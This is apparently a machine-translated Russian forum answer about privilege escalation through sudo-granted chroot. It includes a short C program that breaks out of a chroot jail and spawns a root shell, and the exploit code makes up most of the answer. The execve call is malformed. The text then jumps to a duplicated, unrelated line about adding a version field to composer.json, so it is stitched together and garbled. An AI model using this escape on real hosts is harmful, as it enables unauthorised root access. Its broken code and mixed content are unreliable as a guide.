Скажем, вы задаете следующий вопрос: «Если бы я дал кому-то разрешение на запуск sudo chroot / mnt», они могут получить root на хосте? »Ответ на этот вопрос: да.
Помимо очевидного трудного способа, связанного с mknod (), есть простой способ, если они могут получить компилятор:
#include <fcntl.h>
#include <unistd.h>
int main() {
int n = open("/", 0);
chroot("/bin");
fchdir(n);
chdir("..");
chroot(".");
execve("/bin/sh", "/bin/sh");
}
Хротовые тюрьмы ничего не делают, если у злоумышленника есть корень.
Я решил свою проблему, добавив "version": "1.5.0", после "description" в composer.json.
Я решил свою проблему, добавив "version": "1.5.0", после "description" в composer.json.